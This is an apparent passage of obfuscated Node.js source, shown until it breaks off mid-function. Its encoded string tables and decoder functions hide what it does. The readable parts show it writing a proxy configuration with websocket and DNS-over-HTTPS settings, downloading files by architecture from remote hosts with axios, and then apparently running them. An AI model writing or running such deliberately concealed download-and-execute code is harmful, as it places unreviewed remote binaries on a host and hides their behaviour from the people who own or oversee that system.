_0x35a71e={};_0x35a71e[_0x1ba3c1(0x555,0x69d,0x673,0x6b1)]=0xbbc,_0x35a71e[_0x3c0d74(-0x221,-0xa4,-0xfe,-0x4c)]=_0x1ba3c1(0x569,0x576,0x66c,0x55d),_0x35a71e[_0x1ba3c1(0x588,0x6ac,0x722,0x793)]=_0x5475d0['gmiHi'],_0x35a71e['settings']=_0x3d6fa4,_0x35a71e[_0x1ba3c1(0x720,0x77b,0x6de,0x7bd)+_0x3c0d74(0x21,0x77,-0x9b,-0x121)]={},_0x35a71e[_0x1ba3c1(0x62c,0x4f2,0x3c7,0x49e)]={},_0x35a71e[_0x1ba3c1(0x720,0x77b,0x6de,0x7bd)+_0x3c0d74(0x21,0x77,-0x9b,-0x121)][_0x1ba3c1(0x7a1,0x754,0x823,0x63b)]='ws',_0x35a71e[_0x1ba3c1(0x720,0x77b,0x6de,0x7bd)+_0x3c0d74(0x21,0x77,-0x9b,-0x121)][_0x1ba3c1(0x599,0x5d3,0x6ff,0x607)]=_0x5475d0['OxpeE'];function _0x1ba3c1(_0x15db6b,_0xab7451,_0x20f606,_0x517937){return _0x51c265(_0xab7451-0x1ae,_0xab7451-0x1d6,_0x517937,_0x517937-0x11f);}_0x35a71e[_0x1ba3c1(0x720,0x77b,0x6de,0x7bd)+_0x3c0d74(0x21,0x77,-0x9b,-0x121)][_0x3c0d74(0x3,-0x163,-0x50,-0xea)]={},_0x35a71e[_0x1ba3c1(0x720,0x77b,0x6de,0x7bd)+_0x3c0d74(0x21,0x77,-0x9b,-0x121)][_0x3c0d74(0x3,-0x163,-0x50,-0xea)][_0x1ba3c1(0x64c,0x680,0x7b1,0x604)]=_0x5475d0[_0x1ba3c1(0x41b,0x534,0x491,0x580)],_0x35a71e[_0x1ba3c1(0x62c,0x4f2,0x3c7,0x49e)][_0x1ba3c1(0x746,0x68d,0x7af,0x721)]=!![],_0x35a71e[_0x1ba3c1(0x62c,0x4f2,0x3c7,0x49e)]['destOverri'+'de']=[_0x5475d0[_0x3c0d74(-0x1a4,-0x182,-0xf1,-0x20e)],_0x5475d0['gqaDu'],_0x5475d0[_0x3c0d74(-0xf9,-0x1a6,-0x71,-0xfb)]],_0x35a71e[_0x1ba3c1(0x62c,0x4f2,0x3c7,0x49e)][_0x1ba3c1(0x5c7,0x5e1,0x5d3,0x493)+'ly']=![];const _0xe61cd9={};_0xe61cd9[_0x1ba3c1(0x512,0x60f,0x6b2,0x62a)]=[_0x1ba3c1(0x716,0x6b9,0x64d,0x74a)+'l://8.8.8.'+_0x3c0d74(-0x107,-0x179,-0x130,-0x4e)+'y'];const _0x1d438a={};_0x1d438a[_0x3c0d74(-0x6e,0x6f,-0x2f,-0xd7)]=_0x5475d0[_0x3c0d74(-0xcd,-0x8c,-0x123,-0x48)],_0x1d438a[_0x3c0d74(-0x9b,-0x2b9,-0x1e2,-0x191)]=_0x5475d0['pxAXA'];const _0x2ca254={};_0x2ca254['protocol']=_0x5475d0[_0x3c0d74(-0x28e,-0x249,-0x1b1,-0x1e8)],_0x2ca254['tag']=_0x5475d0[_0x3c0d74(-0x16e,-0x252,-0x1fa,-0x18c)];const _0xce9e46={};_0xce9e46[_0x3c0d74(0xfd,0xa,0x22,-0x26)]=_0xa54619,_0xce9e46[_0x1ba3c1(0x59f,0x538,0x410,0x606)]=[_0x2a301f,_0x51c26c,_0x593209,_0x3d4ea1,_0x35a71e],_0xce9e46[_0x3c0d74(-0x1f6,0xf,-0xba,-0x199)]=_0xe61cd9,_0xce9e46[_0x1ba3c1(0x659,0x526,0x5df,0x57d)]=[_0x1d438a,_0x2ca254];const _0x147ee8=_0xce9e46;fs['writeFileS'+_0x1ba3c1(0x5d5,0x6c7,0x683,0x7aa)](path[_0x3c0d74(0x0,0x99,-0x4b,0xd2)](FILE_PATH,_0x5475d0['AdtCd']),JSON[_0x1ba3c1(0x653,0x537,0x533,0x46b)](_0x147ee8,null,-0x1da0+-0x1b70+-0x1e7*-0x1e));}function getSystemArchitecture(){const _0x341479={};function _0x2ae160(_0x217a5c,_0x582b0a,_0x2bd894,_0x3188b6){return _0x50d979(_0x217a5c-0x41,_0x582b0a-0x1af,_0x582b0a-0x1cb,_0x3188b6);}function _0x3b6fc6(_0x5e6b2e,_0x30c450,_0x4c5dee,_0x5c9399){return _0x51c265(_0x4c5dee- -0x16d,_0x30c450-0xe3,_0x30c450,_0x5c9399-0x1d8);}_0x341479[_0x3b6fc6(0x30d,0x222,0x28c,0x360)]=function(_0x5314d2,_0x7ab56a){return _0x5314d2===_0x7ab56a;},_0x341479[_0x3b6fc6(0x375,0x3c2,0x454,0x3fb)]=_0x3b6fc6(0x411,0x30b,0x444,0x448);const _0x3e1a67=_0x341479,_0x9992ef=os[_0x3b6fc6(0x287,0x2fa,0x2b0,0x3d7)]();return _0x3e1a67['dlOMN'](_0x9992ef,_0x3e1a67[_0x2ae160(0x522,0x54b,0x541,0x5b3)])||_0x3e1a67[_0x2ae160(0x2b9,0x383,0x3ba,0x35c)](_0x9992ef,_0x3b6fc6(0x171,0x2cb,0x232,0x2cc))||_0x3e1a67[_0x2ae160(0x2cd,0x383,0x3e1,0x3db)](_0x9992ef,_0x3b6fc6(0x244,0x1fd,0x298,0x1f2))?_0x3e1a67[_0x3b6fc6(0x41f,0x46b,0x454,0x478)]:_0x3b6fc6(0x2d9,0x1a7,0x293,0x14a);}function _0x1d88(){const _0x529334=['DLr0Du0','Ecz0ExbLpxDZjG','z2LUuMvXDwvZDa','ChHbwee','svfur2G','tM9KzxmGDxbSBW','BfH3EhO','sxLizK8','D3ntzxr0Aw5NCW','y291BNq6ihrYDq','zw5HyMXLza','BIaTlxnRAxaTCa','EhrSCY1YChj4lq','AM9PBG','tMPXtfa','DK10rge','vvbmt0fex1vsta','DhvUBMvSlMPZBW','rK1LDMu','tunkoq','wNzbBuq','ywjJr1u','zLLQENm','ufvSr0u','CIb0AguGy3vYCG','y2XMy0K','Cg9YDa','v25uBgO','DMLZAw9U','zvrbD1DwzePLrq','ywjSzv9Zzw5KxW','zM9YihvZAw5Nia','y291BNrYEunVza','y2DJC2W','yxbPlMnVl2PZBW','qwfAA00','y2XsDgS','s2LsCKm','l3rYB2PHBI1HCG','EhHyEwq','nJaJ','ChjVDg9JB2W','B24GpI9KzxyVBG','C21quNG','s1bzsLK','vMHXzgG','l3zSzxnZlwfYzW','swfjCwu','yMTXz2u','zgf0yq','zuzot0i','iaOGigLUz3jLCW','vwvyEuG','EKHWwfa','Ahr0ChmRBg9Jyq','u2jQAee','ztOGAhr0Cf9ZDa','l2nVBMzPzY55yq','v2zwqMC','B24GDxbSB2fKzq','wgTWyNK','r01Wr04','EhnoDMC','y3jLDdOG','rfr3s2i','zgDLlwLWlxzLCG','vKXvBMW','u0TKCeO','Ew5J','Dw5UzwXtzwnYzq','BgvUz3rO','B0PLA2K','uhLNy1i','zdOG','CdiGls1SB2DMAq','sMTRrwm','DujUAey','BcaYpIyXicy','uhvIBLq','yxzLzcbZDwnJzq','s3H0C0u','BMv0l2fKzc11CG','Ehrnq0q','CuXSDKy','sgvSBg8GD29YBa','wvrbEe9httvova','Dw5SAw5Ru3LUyW','oIbMywXZzqP1Dq','ruTczey','r1ntBKe','CM0GlxjMia','Bwf0y2G','vNDAwMm','BgfjEgm','lI90Bxa','yMXHy2TOB2XL','vKvRveC','zMXVDW','AgfZ','C0nAtw4','y29UC3rYDwn0BW','ru9cBgi','l2fWAs9KzwXLDa','zu5UzMu','ls1ZA2LWlwnVBG','EMLNAMOZmZuYmq','BgX5','ufbQChG','ue9sva','p2vUy3j5ChrPBW','ELH6Bvi','ztOGzMfSC2ukDq','qKXQExi','vLv1s00','zMLSzvvYBa','CvnkqwS','DLrwDLm','EuPYy0u','odq0mW','rxDvr0i','igeGzMLSzsbMBW','y2HTB2q','Bg9N','Bu9fsei','AwDvsK8','CgTPBgWGlwyGiG','zMfSBgjHy2TZ','CgHWihj1BM5PBG','Ahr0CdOVl2LWlq','ic0TzgLZywjSzq','qvjht19bvvri','r0vfteq','l2fWAs9HzgqTBG','cNzSzxnZoI8V','y29UzMLNlNLHBq','zgLYzwn0','tNzUAvm','ywXWBG','C3rYzwfT','yKP6yLG','DgXZjNnUAt0','ywjJzgvMz2HPAG','DhjVAMfU','BM9Kzxm','A2D1Egq','B2TLBIa','tKvAseeGDMfYAq','Chr5lhnRAxaGCG','x19WCM90B19F','zNjLzwrVBq','l2fWAs9HzgqTCW','yMLUza','Ahr0Chm6lY9VBW','AMH2zvm','BwfW','uwLmq0OWswPVAq','ic1Wia','zgvZDa','AuX3rMy','CdiGCNvUic0TDa','yMXLigLZigvTCa','rxjYB3iGzxHLyW','A3zlsKK','mJa4mW','zw52','B0rVBwfPBG','ic1Jici','BMn0Aw9UkcKG','BwjWvu0','qvbqB1e','C3vIlNr4Da','tKvuB2m','yxrLoIb0CNvLcG','ywXS','DgfIBgu','yuvuqLq','zgvZDe92zxjYAq','qvPSrfG','DxjLoIbMywXZzq','BMfxugC','EwvgEgS','EwmUBw4VyM90','zMLUAxnO','Bw5js1q','z2v5BLK','ide4mdakCMvWBW','kcGOlISPkYKRkq','BwvZC2fNzq','y2XPzw50CW','yxr1CZO0mdqkia','cGP0CM9Qyw46lW','Dxz3EhL6','B2rLCW','B3n0BMfTztOG','C3bSAxq','sgz6z00','vfblCNu','ntK1mJG4suH4svf6','CLzUuMW','Dg8GDhvUBMvS','tKfnrq','D2fYBG','ywLK','uhnWCwq','DgXZ','yLfUzgG','sMXYt2W','yw5KoIa','zM9YrwfJAa','BMv0D29YAW','C2z0tNu','B28UC2vYDJaWlG','C25P','id4Vzgv2l251Ba','CMvJDxjZAxzL','Bw1HBMrFzxHLyW','Dgv4Dc9WBgfPBG','tvPoy0W','zxjYB3iGAw4GCW','igLUzM8Gls11CG','yxjT','zwn0DxjL','BePRB2S','m0zLzcuZrdi1nG','cIaGChjVDg9JBW','C2vUza','DxrPBa','yMfZzw5HBwu','D2LUmZi','DMLJztOGAhr0Ca','rNfkt3O','BgXoCfe','DMzbBhi','EgnrDwW','zMjLowi0zJeTnG','zxnZ','tfnpv1i','qxbWigLZihj1BG','rw1WB3DLCM1LBG','Dw5ZAgLMDa','igzHBhnLcMrPCW','ls10Bhm','ww9OqKG','DgrWrxG','qKvhrMS','u1vcx1bbveG','yMXVy2S','tMD1zu4','C3rYzwfTu2v0Da','CZOkicaGic0GAa','DMfqtfC','D2fwvxy','CgXHDgzVCM0','cGP2BwvZCZOVlW','uK1PANO','CMvZCg9UC2vuEq','DwjZy3jPChrPBW','Egr5CNy','vMDIteO','B1vLCLC','C1DUwwi','yxbWBhK','naPZzxj2zxi6ia','tKvAsefFue9sva','zYbLCNjVCJOG','ChvZAa','igzHAwXLzdOG','rxrAvgSYtwPOAW','C2v0DgLUz3m','wxj6qMy','AvLrD3i','zxjYB3i','D2vgAhq','DhvUBMvSlNLTBa','u3LUrKG','C25PzMzPBMC','Dc1KzwXHEsa0ia','yLzZsxi','y2XVC2u','BguG','AhHWD0u','ls1JB25MAwCG','DgfN','zxHPC3rZu3LUyW','zwn0Aw9Ux2nVDq','uKTOEuS','qvDWt1K','A2TMBhC','tw1rmKXuzZbora','yNHJtha','CwTJruS','AhLXqK4','jtngzwqLm0qYnq','z3fHrhu','cMnSAwvUDf9Zzq','tvjyrgS','ttvzEKPOwwPNna','D0n5s3a','CMvHzgrPCLn5BG','AgvHzgvYCW','EuDQDLG','q3H2Ce4','EtOGDhj1zqOGia','Bwf0AwmGywnJzq','rg93BMXVywqG','lcbYzs1YDw5UAq','BKTTC0C','ugffAKG','BM9Uzq','yuTIzva','Aw5MBW','cNnRAxbFy29UBG','BejlsuC','D3n0Eei','zIaVAw0G','DMXLC3m','igLZihj1BM5PBG','BNbTihj1BM5PBG','CM4GDgHPCYiPka','svbirK0','CgfZC3DVCMq','B3jN','s1ngCuq','BgLZDc50Ehq','BMLUzW','r3jmCvi','CMvZCg9UC2u','B3v0yM91BMrZ','DgHLBG','vvr4Bha','EePJveu','ENPdweS','vgHHBMSGEw91ia','Cg9ZDa','BgrYBLa','AMTzBfm','vvvjra','wfjfCve','qvvYyLi','CgLWzq','D1HVs1G','tvvctLO','DcWGzw5QB3KH','qxn3DwW','C3rYAw5NAwz5','Aw5IB3vUzhm','uhfoDgK','tNvztNq','z2Ppvuu','D1DvAxa','v3nIveS','EgrrqwG','AgXprg0','BwTKAxjtEw5J','igfSCMvHzhKGzq','CuneBu0','D2vIihj1BM5PBG','vgfRAhK','rNrOwxi','EffJBe0','ve9sz0e','reP5yMi','Ahr0Chm6lY9HCG','zgvJCNLWDgLVBG','vw5RBM93BG','D2LJEuK2swXREq','yxjTnJq','C2LVBIbHDxrVia','C3vJy2vZCW','vxbrDxi','B2nHBgHVC3q6','nZyXmJjJDNrQAKG','q0zjua','uffIAfa','Dg9tDhjPBMC','AgzzveC','Dvnqs3K','BuDqvxu','ohrSzwXcsa','zw50igfYy2HPDa','DM1LC3m','cIaGDhvUBMvSoG','teDOyLi','DguGls1YzxbVCG','qvvuscb2yxjPyq','Ew1Ysxi','ytvJltq5mZuTyq','tMPSBe0YuM1jAq','BcbODhrWoI8VBa','cMrPC2fIBgvFzG','yxbWBgLJyxrPBW','y2XLyxi','BM9ODxaG','BeDnExq','C2vHCMnO','jNbHDgG9jtjgDa','CM9JCYa+l2rLDG','C2n5','z21PsgK','tKDUEwm','BwDRBMu','vuHHs1e','DwrTzxu','rxjYB3iGAw4GCW','rgnjAKi','uxnsuxi','DgLTzw91Da','mti3lJaUmc4X','tKvAsefFs0vz','BNvSBcaYpIyXia','wxzHyvm','jNbHDgG9jtjgDG','tuDrEu1uvtrzvW','CgrHDguGls1WCG','q0zqt1ju','DgvZDa','DgfYDhnLCNzLCG','Ahr0Chm6lY9HBq','ls1UBY1HDxrVDq','Ce9HAZb6vfzsqG','l2jVB3qUBg9Nia','DhKSihvZzsbXDq','yKz3A0y','sxfQEvO','mtjuBwLnrei','D3vXquG','ztOGDhj1zqPKAq','EfvHrZfovJaXma','n2nHlwq1ytzMmG','C2fIBgvFBMf0oG','B3jJzv91CgrHDa','AuvmALy','shnzseC','vNjvtLy','zNjVBq','q2DsyK4','cIaGicaGig9YAq','r3nzC3G','Afnhuxq','qNfAwK8','mJaZndm1zvfyCunR','yxHPB3m','t3HWzuu','BcbYDw4','DcX1C2uGDg9Rzq','icaTihnLCNzPyW','wwLOvha','ic1Jia','BgvZCY1HCMDVjq','ANvNvfO','CfPivMy','DxrLoIbMywXZzq','ihn1y2nLC3nMDq','cIaGica','r1nuCfa','z2v0','zgXptu4','D2XTsNa','wuPbExu','C3vIC2nYAxb0Aq','oc9KBNmTCxvLCG','D1jLu2C','oYbJAgfYC2v0pq','yw1K','yM9VDc5SB2C','shDYu0K','B24V','DNHIzw0','ywfYy2G2na','sLrpCvq','AYbHzgrLzcbZDq','sfz5Chy','C3rHDhvZ','yxrTzLu','ig5VDcbMB3vUza','BM9utfnwzxjPzG','zs1UB2rLCW','CNrFzgvSyxK6ia','r253CLu','CM9Qyw4TyxjNBW','DhLWzq','mtqZnJy3mgfMBLrdta','ic1Zia','sw5ey2G','r2Dzq3i','renytfC','l3zTzxnZlwfYzW','qvjht19bvvriia','E30Uy29UC3rYDq','wgPUquC','mtm2otnmBMnoEKK','shnVvKW','yxjJAa','tKvAsefFu0vsvG','AKntswG','mJa1mW','zwvHn2zL','wNfjAw8','qvjht19qt1ju','t2DVBuq','C2vJDxjPDhK','BhnLcMLUC2vJDq','vw5Iq3K','BMCGB24GCg9YDa','yurlt1K','cIaGicaGihnLCG','CIbPCYbYDw5UAq','DxjS','Dw5SAw5R','qvjht19et01bsq','BgLZDgvU','DgHPCYbZy3jPCa','Cg9W','B1Dpvxa','Bwv0ywrHDgfpBG','AuLyreC','rKTlCM4','CMvHzezPBgvtEq','zM9Yia','zMLYzwzVEa','DxjPDhK9DgXZjG','v25PBgG','ywDKBLi','uenKD0u','BJ1UB25LjNnLyW','BMv0','BgvZoG','qw9zEMu','B3iG','BKjxCfG','AxngAwXL','DwXSEq','EMDdEMC','tKLIz1i','rgXUr3G','r0nyBLO','C3rHDfn5BMm','BI9QC29U','CvDwsxy','q29UDgvUDc1uEq','id4GBNvSidi+jG','yuTwzeC','BNq6ihrYDwukCW','y29UC29Szq','igLZignYzwf0zq','q2fUj3qGzMLUza','ywrK','CfDWzLi','CMv0DxjUicHMDq','ywnJzxnZ','uMrmuhK','DgnW','ls1SB2DSzxzLBa','DhvUBMvSic0Tzq','zuj4DMe','vxvVCMW','Ahr0Ca','CMvFDgXZoIb0CG','vfHuv1i','suHxC1m','C2vYDMvYCW','C2v0','rxDrrum','cIaGy3jLzgvUDa','Aw5NigjVB3qUBa','A1fNwvq','CxvPyW','jMzWpwzPCMvMBW','EwmUBw4VD2vI','uu5vBM0','tNzyze4','v1znEMu','y2XuBfG','BcaYpIyX','EwmUBw4VDJe','C2ukz3b1oIbMyq','yxbPlMnVBs9QCW','AwnRihr1BM5LBa','zg5Z','x3rVx3vWz3jHza','y2f0y2G','vvLcDeO','wLnvufe','BwWIid4Vzgv2lW','EevsyNu','zMLSzu5HBwu','mtjSCNbIyvu','rwPyruG','y2HPBgrFChjVyW','l2rLDI9UDwXS','u1LcBLq','CeDxBLu','C25Ppq','uxvgyKm','vK1XB0m','mJa5nG','zxHJzxb0Aw9U','mJa4nW','CNrkEuu','BIbJB25Uzwn0ia','yMfZzty0','ExjWD0C','A2XTBM9WCxjZDa','y3rVCIGICMv0Dq','BZ9Lzd0YntyW','DxrPBMCGy29TBq','ufjpsKvdvf9vuG','sujmBwO','zgLZywjSzv9JBW','Aw5NCW','r3n4CNy','uhDNB2S','Bty0lNnZC3mUBG','qNbYC3q','uuTVzM4','q0XQz0e','ExLXz1y','r05NAhu','DcbZDwnJzxnZia','D3jPDgvgAwXLuW','DxrMltG','qxjNB0rVBwfPBG','sw5qqxa','q3fOqKW','uxvfwwq','AKzRtfq','v1Hmyxi','l3r1BM5LBc55Bq','AND3Ew8','uLzNzvm','rgnzCLy','Aw5JBhvKzxm','Ag9ZDd0','zdy0lNnZC3mUBG','rxjYB3iGCMvHza','BeHiDKS','tuHzEM8','y2rUCY5KB29UlG','y29UzMLNlMPZBW','B2j0ywLUiefYzW','nJqZmtq2wgzgrwjm','t09kBKq','zMXVB3i','DgfXEMm','Ag9ZDa','zMLSDgvY','zufTBvm','zxLkAeLQB2LorW','zv9HDxrVx3vWza','BhnLcMrPC2fIBa','vg5Zu0i','uNL3y0i','ywjSzsbPCYbLBq','rLLQvxG','yKDNEeC','zMfSC2u','wLrkEuK','zxHLyW','DKfICgS','B3rVy29SigH0Da','tuj6D2q','wvDbwgW','C3nMDwXSEq','Bwv0Ag9K','zuDAtK8','v3PRBxa','tM1nEKzQtLrkAa','txf1tfG','Bg9NBgv2zwW','EwmUBw4VywDLBG','AwfSCY1MAwXLoG','rhfZCwO','vw5Oyw5KBgvKia','Cgf0Aa','ntGZmZq3mfjwEhrYra','zxuUB3jN'];_0x1d88=function(){return _0x529334;};return _0x1d88();}function downloadFile(_0x2e4f46,_0x37e2f0,_0x1f67bd){const _0x328a5c={'YihTp':_0x22b3b6(0x667,0x677,0x5f4,0x4b9)+_0xd30acb(0x366,0x34c,0x340,0x375)+'tartserver'+':','AoYze':function(_0x4ff127,_0x5ca45f){return _0x4ff127!==_0x5ca45f;},'UTxlp':'FKeff','InPAp':function(_0x272473,_0x18434a){return _0x272473(_0x18434a);},'VwZZc':function(_0x1162e0,_0xe09079){return _0x1162e0+_0xe09079;},'IBLmj':function(_0x3fc7a8,_0x53caa6){return _0x3fc7a8+_0x53caa6;},'xsNvg':_0x22b3b6(0x743,0x67d,0x6ae,0x6e3),'HHvIF':_0xd30acb(0x205,0x159,0x236,0x130),'CLjgA':_0x22b3b6(0x5cd,0x60f,0x51b,0x411),'NjqLP':_0x22b3b6(0x604,0x571,0x682,0x541)},_0x261d8b=_0x2e4f46;function _0x22b3b6(_0x1103d2,_0x42f9df,_0x26a20d,_0x10a2b8){return _0x50d979(_0x1103d2-0x109,_0x42f9df-0x1e9,_0x26a20d-0x364,_0x10a2b8);}if(!fs[_0x22b3b6(0x334,0x555,0x46f,0x36e)](FILE_PATH)){if(_0xd30acb(0xec,0x212,0x230,0x46)===_0x328a5c['HHvIF'])_0x17b687['error'](_0x328a5c[_0x22b3b6(0x3f8,0x41a,0x512,0x60b)],_0x24b8c1);else{const _0x9d0e97={};_0x9d0e97[_0xd30acb(0x362,0x28c,0x27c,0x2f6)]=!![],fs[_0xd30acb(0x149,0x1b6,0x28d,0x8d)](FILE_PATH,_0x9d0e97);}}const _0x78d028=fs['createWrit'+'eStream'](_0x261d8b),_0xdb1f16={};_0xdb1f16[_0xd30acb(0x27f,0x31c,0x220,0x36c)]=_0x328a5c[_0xd30acb(0x24f,0x231,0x385,0x1a2)],_0xdb1f16[_0xd30acb(0x1e3,0x2c1,0x32d,0xf8)]=_0x37e2f0,_0xdb1f16[_0xd30acb(0xe7,0x1c1,-0x54,-0x36)+'pe']=_0x328a5c[_0x22b3b6(0x4b7,0x5a8,0x606,0x4e5)];function _0xd30acb(_0x11a8e6,_0x1f9ba4,_0x4624f0,_0x46f38a){return _0x51c265(_0x11a8e6- -0x249,_0x1f9ba4-0x7e,_0x46f38a,_0x46f38a-0x2f);}axios(_0xdb1f16)[_0xd30acb(0x130,0xdb,0x155,0x178)](_0xb7e2ef=>{function _0x1fc2a7(_0x6ced8e,_0x279468,_0x23054f,_0x492aae){return _0x22b3b6(_0x6ced8e-0x19d,_0x279468-0x15,_0x23054f- -0x68f,_0x6ced8e);}const _0x53b1aa={'UYBtJ':function(_0x5903fa,_0xd32466){function _0xfd9bb8(_0x123c6c,_0x15660b,_0x400f0c,_0x185a39){return _0x43ed(_0x15660b-0x1a7,_0x123c6c);}return _0x328a5c[_0xfd9bb8(0x4ee,0x503,0x3e4,0x3bc)](_0x5903fa,_0xd32466);},'bFwkF':function(_0x459b62,_0x55f328){function _0x113505(_0x2ed941,_0x4fea60,_0x247df3,_0x40dbb2){return _0x43ed(_0x4fea60-0x177,_0x247df3);}return _0x328a5c[_0x113505(0x4c6,0x432,0x30d,0x4c0)](_0x459b62,_0x55f328);},'ertyj':_0x1fc2a7(-0x9d,-0xe7,-0x117,-0x186)+_0x1fc2a7(-0x53,-0x11d,0x10,-0x1d),'Xqima':function(_0x8b48cb){return _0x8b48cb();}};_0xb7e2ef[_0x16d85a(0x6e8,0x666,0x651,0x607)][_0x1fc2a7(-0xef,-0x166,-0x1e8,-0x1b8)](_0x78d028);function _0x16d85a(_0x3371ec,_0x56cc4a,_0x3f631e,_0x2cb4e0){return _0x22b3b6(_0x3371ec-0xc9,_0x56cc4a-0x11c,_0x56cc4a-0x3d,_0x3371ec);}_0x78d028['on'](_0x328a5c[_0x16d85a(0x61c,0x673,0x6de,0x615)],()=>{_0x78d028['close']();function _0x1c918b(_0x34284b,_0x1db4c6,_0x315af0,_0x1793eb){return _0x1fc2a7(_0x1db4c6,_0x1db4c6-0x1a,_0x1793eb-0x165,_0x1793eb-0x10b);}console[_0x1c918b(0x197,0xa2,0x145,0x148)](_0x23e454(-0xcf,-0xaf,-0x120,-0xc3)+path['basename'](_0x261d8b)+('\x20successfu'+_0x23e454(0xb7,0xfd,0xbe,0x1)));function _0x23e454(_0x250477,_0x52c395,_0x1965ec,_0x57438d){return _0x16d85a(_0x250477,_0x1965ec- -0x5e1,_0x1965ec-0x70,_0x57438d-0x21);}_0x1f67bd(null,_0x261d8b);}),_0x78d028['on'](_0x1fc2a7(-0x328,-0x252,-0x22c,-0x196),_0x2379e7=>{function _0x2ddb9b(_0x32b870,_0x518072,_0x2f0da1,_0x270ae3){return _0x16d85a(_0x2f0da1,_0x518072-0x48,_0x2f0da1-0x161,_0x270ae3-0x1c2);}function _0x6d374e(_0x43079e,_0x5a752f,_0x4f9857,_0xa4d532){return _0x16d85a(_0xa4d532,_0x5a752f- -0x700,_0x4f9857-0xc3,_0xa4d532-0x132);}if(_0x328a5c[_0x6d374e(-0x1e1,-0x160,-0xe3,-0x81)](_0x328a5c[_0x6d374e(-0x1b5,-0x226,-0x324,-0x328)],_0x328a5c[_0x6d374e(-0xf5,-0x226,-0x295,-0x210)])){const _0x588377=_0x12901a(YecBuQ[_0x2ddb9b(0x629,0x61e,0x70c,0x679)](YecBuQ[_0x6d374e(-0xf5,-0x1c9,-0x146,-0x247)](YecBuQ['ertyj'],_0x6d374e(-0x23d,-0x187,-0x2c1,-0x164)+_0x2ddb9b(0x76a,0x634,0x77f,0x4ff)+_0x2ddb9b(0x5d2,0x517,0x486,0x4de)+'\x20)'),');'));_0x59d9cb=YecBuQ['Xqima'](_0x588377);}else{fs['unlink'](_0x261d8b,()=>{});const _0x13e3c1=_0x2ddb9b(0x5d9,0x509,0x3f8,0x58b)+path[_0x6d374e(-0x68,0x18,-0x51,0x112)](_0x261d8b)+_0x2ddb9b(0x445,0x4e3,0x544,0x464)+_0x2379e7[_0x6d374e(0xad,-0x10,0x74,0x26)];console[_0x6d374e(-0x26f,-0x260,-0x17d,-0x2b2)](_0x13e3c1),_0x328a5c[_0x2ddb9b(0x76e,0x647,0x697,0x6dc)](_0x1f67bd,_0x13e3c1);}});})['catch'](_0x4562e8=>{function _0x3dc7ee(_0x47020c,_0x27e42b,_0x4f6ba7,_0x1f57cb){return _0x22b3b6(_0x47020c-0xf9,_0x27e42b-0x58,_0x4f6ba7- -0x1bb,_0x1f57cb);}const _0x1d2102=_0x12ab65(0x268,0x31a,0xd2,0x1e5)+path[_0x3dc7ee(0x43d,0x5d5,0x520,0x633)](_0x261d8b)+_0x3dc7ee(0x32b,0x2f5,0x2a3,0x22c)+_0x4562e8[_0x3dc7ee(0x606,0x4f9,0x4f8,0x431)];function _0x12ab65(_0x42a8ab,_0x176116,_0x29f6de,_0x1d7453){return _0x22b3b6(_0x42a8ab-0x1b5,_0x176116-0x162,_0x1d7453- -0x29f,_0x42a8ab);}console[_0x12ab65(0xff,0x233,0x270,0x1c4)](_0x1d2102),_0x1f67bd(_0x1d2102);});}async function downloadFilesAndRun(){const _0x368103={'hfYTG':function(_0x5595dc,_0x3174f3){return _0x5595dc(_0x3174f3);},'BLjyr':function(_0x2cd2ee,_0x1bd975){return _0x2cd2ee!==_0x1bd975;},'HVypv':_0x32af4d(-0x1b1,-0x20f,-0xd7,-0x24f),'vAbpk':'YhKeb','xQclM':function(_0x512f56,_0x267cf1,_0x1849c7,_0xc0773){return _0x512f56(_0x267cf1,_0x1849c7,_0xc0773);},'clTlX':_0x3f12f4(0x15f,0x23b,0x27c,0x38d),'KJqJA':_0x32af4d(-0x1ee,-0x286,-0x225,-0x170),'UeXyH':function(_0x451651,_0x237b83){return _0x451651===_0x237b83;},'Xkpby':_0x3f12f4(0x3dc,0x2c3,0x3b5,0x38b),'jhveS':_0x32af4d(-0xba,0x42,-0x1e2,-0x151),'CkYpj':_0x32af4d(0x2c,0x10a,-0x28,-0xad),'KDJqz':_0x32af4d(-0x45,-0xc,-0x6a,-0x187),'QKofn':_0x32af4d(-0x168,-0x246,-0x219,-0x1c),'UCivl':_0x3f12f4(0x21b,0x26d,0x1eb,0x15d),'ldrnP':function(_0x22cbc8,_0x386dd3){return _0x22cbc8===_0x386dd3;},'xJcTE':_0x3f12f4(0x255,0xa3,0x1c3,0x2f0)+'m64.ssss.n'+_0x3f12f4(0x25a,0x311,0x2f6,0x1cb)+'t','weFht':_0x3f12f4(0x2d5,0x157,0x1fa,0x1b4)+_0x32af4d(-0x70,-0xa2,0x88,0xca)+_0x3f12f4(0x424,0x313,0x2f6,0x272)+'t','LktAI':function(_0x6590d5,_0x3c4142){return _0x6590d5===_0x3c4142;},'TPKru':_0x32af4d(0x97,-0x1c,0x7e,-0xac),'UpQur':_0x32af4d(-0x17f,-0xde,-0x1eb,-0x145)+_0x32af4d(-0x85,-0xe3,0x8b,-0xd3)+_0x3f12f4(0x2a1,0x33a,0x297,0x364),'JkkEc':function(_0x5b362c,_0x37ef14,_0x246aca){return _0x5b362c(_0x37ef14,_0x246aca);},'WsbTK':_0x3f12f4(0x397,0x2a3,0x351,0x44c)+'d!','PPjpx':function(_0x658ea2){return _0x658ea2();},'JTOqT':function(_0x147871,_0x5ed691){return _0x147871===_0x5ed691;},'aKbeP':'NYGdc','DJybb':'Error\x20down'+'loading\x20fi'+_0x32af4d(-0xdb,-0x227,-0x126,-0x2d),'GMpGN':function(_0x5ce3b4,_0x4f2df2){return _0x5ce3b4!==_0x4f2df2;},'TORgA':_0x3f12f4(0x1ab,0x1ff,0x2ab,0x1e8),'igUJO':'443','EKBdF':_0x3f12f4(0x4c2,0x386,0x373,0x368),'WVMze':_0x3f12f4(0x1ce,0x183,0x2ac,0x20c),'thuka':_0x32af4d(-0x94,-0x101,-0x1bc,0x64),'clfcI':_0x3f12f4(0x36d,0x27c,0x3a0,0x488),'Pspqd':_0x32af4d(-0xfa,-0x10,-0x6d,-0x23),'UHaKQ':'true','yrpwG':_0x3f12f4(0x3d7,0x369,0x2e8,0x339),'iIXDG':_0x32af4d(0x8d,0x67,0x1d2,0xce),'wCyKp':function(_0x6dca98,_0x26d4cb){return 